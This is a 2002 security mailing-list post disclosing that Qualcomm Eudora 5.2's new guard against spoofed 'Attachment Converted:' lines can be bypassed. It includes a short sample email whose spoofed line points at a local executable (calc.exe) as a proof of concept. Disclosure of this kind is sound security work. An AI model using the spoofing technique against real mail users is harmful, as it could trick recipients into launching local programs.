Eudora 5.2 attachment spoof

From: Paul Szabo (pszat_private)
Date: Wed Nov 13 2002 - 12:44:50 PST

    Qualcomm Eudora 5.2 has been released recently. Quoting from
    http://www.eudora.com/download/eudora/windows/5.2/RelNotes.txt :

    > Added checks to prevent spoofed Attachment Converted: exploits.
    > We now guard against exploits that rely on local file refs (using either
    > fixed paths or relative paths). On by default and controlled by
    > <x-Eudora-option:RemoveSuspiciousLocalFileRefs>.

    Those fixes are not very robust. Attachments can still be spoofed, e.g.
    with message:

      From: me
      To: you

      It does not seem to matter much what MIME boundary we use,
      a "bare" spoofed attachment line is NOT prefixed with #?
      Attachment Converted: "c:\winnt\system32\calc.exe"
      Never mind that the text comes out all funny...

    Any other tricks we can play?

    Cheers,

    Paul Szabo - pszat_private  http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics  University of Sydney   2006  Australia